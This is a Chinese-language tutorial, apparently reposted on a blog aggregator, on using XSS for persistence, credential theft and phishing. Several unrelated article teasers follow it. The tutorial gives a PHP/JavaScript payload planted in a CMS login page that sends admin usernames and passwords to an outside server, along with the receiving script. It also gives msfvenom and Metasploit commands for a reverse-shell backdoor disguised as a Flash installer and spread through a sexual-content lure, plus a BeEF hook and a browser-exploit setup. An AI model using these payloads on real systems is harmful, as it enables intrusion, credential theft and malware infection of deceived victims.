WEB攻防-通用漏洞_XSS跨站_权限维持_捆绑钓鱼_浏览器漏洞

目录

XSS的分类

XSS跨站-后台植入Cookie&表单劫持

【例1】:利用beef或xss平台实时监控Cookie等凭据实现权限维持

【例2】:XSS-Flash钓鱼配合MSF捆绑上线

【例3】:XSS-浏览器网马配合MSF访问上线


XSS的分类

反射型(非持久型)

存储型(持久型)

DOM型

MXSS(突变型XSS)

UXSS(通用型xss)

Flash XSS

上面这部分在上两篇文章讲过

UTF-7 XSS、MHTML XSS、CSS XSS、VBScript XSS,这几个基本上是淘汰的了,IE8之前才会受影响,没什么价值

XSS跨站-后台植入Cookie&表单劫持

- 条件:已经取得了web权限,要对后台的权限进行长期控制

  1. 可以借助xss盗取cookie,把它写入到登录成功文件,利用beef或xss平台实时监控Cookie等凭据实现权限维持,这种方法即使管理员把后台账号密码改了,或者把后门删除了,也可以进行权限维持。(因为是插入的是xss-JavaScript语句,不会被后门工具识别)

  2. 若存在同源策略或防护情况下,cookie获取失败或者密文密码解密不了,可以采用表单劫持或者通过数据明文传输来实现;

【例1】:利用beef或xss平台实时监控Cookie等凭据实现权限维持

1. 通过xxs平台或beef实时获取登录cookie

登录的框页面http://127.0.0.1:8105/admin/login/login.php

登录成功后会跳转到http://127.0.0.1:8105/admin/index.php?lang=cn 我们就可以在登录成功的admin/index.php里面,管理员进行登录时,就可以实时触发到xss平台或者BeEF获取到相关登录信息。

① 将跨站代码写入admin/index.php:

②成功登录网站后台

③打开beef,就可看到该主机已上线

可以观察到,他加载的数据包的内容

1645930528211-65b05c55-4c00-4f7c-8690-355d6b4ee154.png

这样,只要登录成功就能获取,就能进行实时控制。进行了权限维持。

但是有一些网站不采用cookie,或者获取到的cookie不全,但是还是不能登录。

正常来讲,访问这个地址:http://127.0.0.1:8105/admin/index.php?lang=cn 进行抓包修改

有时候xss平台获取的cookie是不全的,或者说错误的。一般来说少了phpsessid (或者有防护httponly等)

那么就进行实时截取明文账号密码,这样才能进行权限维持。需要一定的代码基础,能读懂数据的传输流程。

2. 实时截取明文账号密码

主要解决两个问题: 1.cookie失败的时候(截取不到); 2.取得一些权限,密码解密不了

① 观察这个网站的登录流程是怎样的: 登录地址http://127.0.0.1:8105/admin/login/login.php 找到相对应的代码段D:\phpstudy_pro\WWW\xss-MetInfo5.1.4\admin\login\login.php 抓取登录的数据包

1645931769293-0668f567-0b99-4edc-9c95-e60cbea30cc5.png

可以看到,他提交的数据包(账号、密码)是发送给了login_check.php文件

1645932659164-9f516362-c71f-490a-97ce-8135adcc8153.png

action=login&loginlang=login.php%3Flangset%3Dcn&login_name=admin&login_pass=admin&Submit=%E7%99%BB%E5%BD%95 再次观察login_check.php

接受账号密码的变量: 接受账号:$metinfo_admin_name 接受密码:$metinfo_admin_pass

② JavaScript语句将账号和密码进行发送:通过get.php来实现接收

<script src="http://www.xiaodi8.com/get.php?user="账号"&pass"密码""></script> 

在PHP中,JavaScript语句通过变量($up)来接收,构造payload:

$up='<script src=http://47.94.236.117/web/get.php?user='.$metinfo_admin_name.'&pass='.$metinfo_admin_pass.'></script>';

echo $up;

③ 在自己的服务器47.94.236.117,新建get.php,用于接收账号密码,并写到newfile文件中

<?php
$u=$_GET['user']; 
$p=$_GET['pass']; 
$myfile=fopen("newfile.txt","a+"); 
fwrite($myfile,$u); fwrite($myfile,'|');
fwrite($myfile,$p); 
fwrite($myfile,'\n'); 
fclose($myfile); 
?> 

然后尝试登录这个网站中,可以看到他尝试请求http://47.94.236.117/web/get.php这个网站,把admin和password发送出

get.php接收到到的账号密码,就会保存到newfile中记录,这个时候就可以进行测试了。

【例2】:XSS-Flash钓鱼配合MSF捆绑上线

-条件:beef上线受控后或直接钓鱼(受害者爱看SESE)

① 生成后门,攻击pc端的:利用msf工具

msfvenom -p windows/meterpreter/reverse_tcp LHOST=47.100.167.248 LPORT=1111 -f exe > flash.exe

1645947250053-258f9072-70ec-4ee5-990f-f41edacaff97.png

 ② 模仿flash下载官方地址(https://www.flash.cn/ )做出本地页面:http://127.0.0.1:8081/ (构造一个相似域名的网址,更逼真)

③ 把后门放在D:\phpstudy_pro\WWW\web\目录,比如,index.html文件,

把“立即下载”链接的地址改为后门下载地址:http://127.0.0.1:8081/web/flash.exe

运行后门exe并且安装正常的文件,所以需要捆绑正常文件, 在官方网站下载一个正常的flash文件

正常文件:flashcenter_pp_ax_install_cn.exe

后门文件:flash.exe

把两个文件放在一起,压缩

选择高级,自解压选项,解压到c:\windows\tmp

点击设置:解压前运行后门文件

1645948640597-c2a026fa-ce97-4e70-aa68-f0198b0322c7.png

在确定,压缩为rar文件,然后把文件名改成flash_install.exe,再把文件的图标进行修改。

图标修改用到Restorator2018_Full_1793_FIX工具,图片可以从官方的安装包中导出,然后再把它替换到我们创建的exe中

1645949000852-8c465f4c-09f4-43cc-be7a-20c9122ec1c3.png

启动msf监听: msfconsole

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 0.0.0.0    //绑定本地的任意网卡

set lport 1111        //设置监听本地的1111端口

run                      //开启监听

1645949796543-4278c321-9e0d-49df-bafe-fe7bd79dfa26.png

那个别人是怎么访问你这个地址呢?

1.通过xss beef来让浏览器自动跳转到下载后门的地址,并且运行

2.直接发给对方诱使他去访问。 通过发送消息,比如小迪与某主播瑟瑟画面流出:http://127.0.0.1:8081/web/诱惑.html 当访问者点击“播放按钮”,提示下下载FLASH,当对方安装flash时,后门执行,等待其上线

上线后,可以获取到对方的服务器信息

执行命令getuid、shell、whoami 等

这一类遇到的问题:免杀问题(后门下载下来会遭到火绒等查杀)

【例3】:XSS-浏览器网马配合MSF访问上线

-条件:beef上线受控后或直接钓鱼(浏览器存在0day) 配合漏洞CVE-2019-1367,这个版本是IE11的漏洞,但是没有公开exp。

参考文章:https://www.cnblogs.com/yuzly/p/11609934.html

漏洞CVE-2020-1380:https://bbs.pediy.com/thread-263885.htm

但是前面的漏洞并没有公开,所以只能用到ms14_064这个漏洞,参考https://blog.csdn.net/wylululu/article/details/103868759 用的是Windows7这个版本的IE,在当前的网络环境中就很少他了。

1、配置MSF生成URL use exploit/windows/browser/ms14_064_ole_code_execution

set allowpowershellprompt true

set target 1

run

1646028417415-aeab27a8-1859-40e9-acd7-2ca27853058a.png

运行就会生成一个网码地址(http://47.100.167.248:8080/9gwKDtliqQz ),这个地址只要一访问就会被触发。但是这个地址只针对window7/window xp操作系统的IE浏览器访问

使用kali搭建的msf:

只要访问这个地址,就可以直接拿下服务器权限。还需要用满足的浏览器和Windows版本。 内核,操作系统,还有杀毒软件,都会导致失败。要懂得前提条件,不是只要访问就可以上线。

那么他在xss中如何实现呢?

在beef中启动:docker run --rm -p 3000:3000 janes/beef 

登录beef:47.100.167.248:3000/ui/panel

构造代码:<script src=http://47.100.167.248:3000/hook.js></script> 把代码放在自己网站上,比如,我的博客上(或者本地网站上)的test.html,只要对方访问192.168.199.1:8081/web/test.html,在beef就可以看到对方上线,

在beef上,利用浏览器跳转功能,自动跳转访问到msf生成的访问地址

1646031545946-985a8596-b895-4dd0-a855-cc36225a2488.png

然后就可以监控到对方上线,完成测试。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/954102.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

21、Transformer Masked loss原理精讲及其PyTorch逐行实现

1. Transformer结构图 2. python import torch import torch.nn as nn import torch.nn.functional as Ftorch.set_printoptions(precision3, sci_modeFalse)if __name__ "__main__":run_code 0batch_size 2seq_length 3vocab_size 4logits torch.randn(batch…

上传自己的镜像到docker hub详细教程

上传自己的镜像到docker hub详细教程 本博客通B站视频一致&#xff1a; 上传自己的镜像到docker hub详细教程 1. 登录自己的hub.docker.com的账号 docker hub仓库 2. 点击Repositories&#xff0c;跳转到创建仓库页面 3. 点击Create a repository 创建repository&#xff0c…

高级软件工程-复习

高级软件工程复习 坐标国科大&#xff0c;下面是老师说的考试重点。 Ruby编程语言的一些特征需要了解要能读得懂Ruby程序Git的基本命令操作知道Rails的MVC工作机理需要清楚&#xff0c;Model, Controller, View各司什么职责明白BDD的User Story需要会写&#xff0c;SMART要求能…

初学stm32 --- SPI驱动25Q128 NOR Flash

目录 SPI介绍 SPI结构框图介绍 SPI外设对应的引脚 SPI数据发送与接收 SPI工作原理 SPI 全双工模式的通信机制 从机返回主机之前保存的数据 SPI工作模式介绍 SPI相关寄存器介绍&#xff08;F1 / F4 / F7&#xff09; SPI控制寄存器1&#xff08;SPI_CR1&#xff09; SPI状…

yum系统报错:SyntaxError: multiple exception types must be parenthesized

执行yum相关步骤报错如下&#xff1a; File "/usr/bin/yum", line 30except KeyboardInterrupt, e:^^^^^^^^^^^^^^^^^^^^ SyntaxError: multiple exception types must be parenthesized原因&#xff1a;python解释器版本错误&#xff0c;yum运行版本为python 2.7&am…

STM32第5章、IWDG

一、简介 IWDG&#xff1a;全称是Independent watchdog&#xff0c;即独立看门狗。本质上是一个能产生系统复位信号的计数器。 特性&#xff1a; 是一个递减计数器。 时钟信号由独立的RC振荡器提供&#xff0c;可在待机和停止模式下运行。 看门狗被激活后&#xff0c;当递减计…

快速上手 HarmonyOS 应用开发

一、DevEco Studio 安装与配置 1. DevEco Studio 简介 DevEco Studio 是 HarmonyOS 的一站式集成开发环境&#xff08;IDE&#xff09;&#xff0c;提供了丰富的工具和功能&#xff0c;支持 HarmonyOS 应用开发的全流程。 2. DevEco Studio 下载与安装 下载地址&#xff1a…

ThinkPHP 8的一对一关联

【图书介绍】《ThinkPHP 8高效构建Web应用》-CSDN博客 《2025新书 ThinkPHP 8高效构建Web应用 编程与应用开发丛书 夏磊 清华大学出版社教材书籍 9787302678236 ThinkPHP 8高效构建Web应用》【摘要 书评 试读】- 京东图书 使用VS Code开发ThinkPHP项目-CSDN博客 编程与应用开…

像JSONDecodeError: Extra data: line 2 column 1 (char 134)这样的问题怎么解决

问题介绍 今天处理返回的 JSON 的时候&#xff0c;出现了下面这样的问题&#xff1a; 处理这种问题的时候&#xff0c;首先你要看一下当前的字符串格式是啥样的&#xff0c;比如我查看后发现是下面这样的&#xff1a; 会发现这个字符串中间没有逗号&#xff0c;也就是此时的J…

国产编辑器EverEdit - 扩展脚本:新建同类型文件(避免编程学习者反复新建保存练习文件)

1 扩展脚本&#xff1a;在当前文件目录下新建同类型文件 1.1 应用场景 用户在进行编程语言学习时&#xff0c;比如&#xff1a;Python&#xff0c;经常做完一个小练习后&#xff0c;又需要新建一个文件&#xff0c;在新建文件的时候&#xff0c;不但要选择文件类型&#xff0c…

Java+Maven+GDAL

下载已经编译好的压缩包&#xff0c;下载地址 解压 jar 包 release-1930-x64-dev.zip\release-1930-x64\bin\gdal\java 目录下 打成Maven依赖 mvn install:install-file -Dfilegdal-3.10.1.jar -DgroupIdorg.gdal -DartifactIdgdal -Dversion3.10.1 -Dpackagingjar -Dgener…

个人主页搭建全流程(Nginx部署+SSL配置+DCDN加速)

前言 最近开始准备秋招&#xff0c;打算做一个个人主页&#xff0c;以便在秋招市场上更有竞争力。 目前&#xff0c;现有的一些搭建主页的博文教程存在以下一些问题&#xff1a; 使用Github Page进行部署&#xff0c;这在国内访问容易受阻使用宝塔面板等框架&#xff0c;功能…

【Linux探索学习】第二十五弹——动静态库:Linux 中静态库与动态库的详细解析

Linux学习笔记&#xff1a; https://blog.csdn.net/2301_80220607/category_12805278.html?spm1001.2014.3001.5482 前言&#xff1a; 在 Linux 系统中&#xff0c;静态库和动态库是开发中常见的两种库文件类型。它们在编译、链接、内存管理以及程序的性能和可维护性方面有着…

【Rust自学】12.4. 重构 Pt.2:错误处理

12.4.0. 写在正文之前 第12章要做一个实例的项目——一个命令行程序。这个程序是一个grep(Global Regular Expression Print)&#xff0c;是一个全局正则搜索和输出的工具。它的功能是在指定的文件中搜索出指定的文字。 这个项目分为这么几步&#xff1a; 接收命令行参数读取…

算法-贪心算法简单介绍

下面是贪心算法视频课的导学内容. 目录 1. 什么是贪心算法?2. 贪心算法简单的三个例子:1. 找零问题2. 最小路径和问题3. 背包问题 3. 贪心算法的特点4. 贪心算法学习的方式? 1. 什么是贪心算法? 简单来说, 我们称以局部最优进而使得全局最优的一种思想实现出来的算法为贪心…

Node.js - Express框架

1. 介绍 Express 是一个基于 Node.js 的 Web 应用程序框架&#xff0c;主要用于快速、简便地构建 Web 应用程序 和 API。它是目前最流行的 Node.js Web 框架之一&#xff0c;具有轻量级、灵活和功能丰富的特点。 核心概念包括路由&#xff0c;中间件&#xff0c;请求与响应&a…

day08_Kafka

文章目录 day08_Kafka课程笔记一、今日课程内容一、消息队列&#xff08;了解&#xff09;**为什么消息队列就像是“数据的快递员”&#xff1f;****实际意义**1、产生背景2、消息队列介绍2.1 常见的消息队列产品2.2 应用场景2.3 消息队列中两种消息模型 二、Kafka的基本介绍1、…

459. 重复的子字符串【力扣】——kmp拼接字符串解法

常规kmp解答 class Solution { public:void getNext(int *next,string s){int j0;next[0]0;for(int i1;i<s.size();i){while(j>0 && s[i]!s[j]){jnext[j-1];}if(s[i]s[j]) j;next[i]j;}}bool repeatedSubstringPattern(string s) {if(s.size()0) return false;i…

浅谈云计算06 | 云管理系统架构

云管理系统架构 一、云管理系统架构&#xff08;一&#xff09;远程管理系统&#xff08;二&#xff09;资源管理系统&#xff08;三&#xff09;SLA 管理系统&#xff08;四&#xff09;计费管理系统 二、安全与可靠性保障&#xff08;一&#xff09;数据安全防线&#xff08;…

【STM32】HAL库USB实现软件升级DFU的功能操作及配置

【STM32】HAL库USB实现软件升级DFU的功能操作及配置 文章目录 DFUHAL库的DFU配置修改代码添加条件判断和跳转代码段DFU烧录附录&#xff1a;Cortex-M架构的SysTick系统定时器精准延时和MCU位带操作SysTick系统定时器精准延时延时函数阻塞延时非阻塞延时 位带操作位带代码位带宏…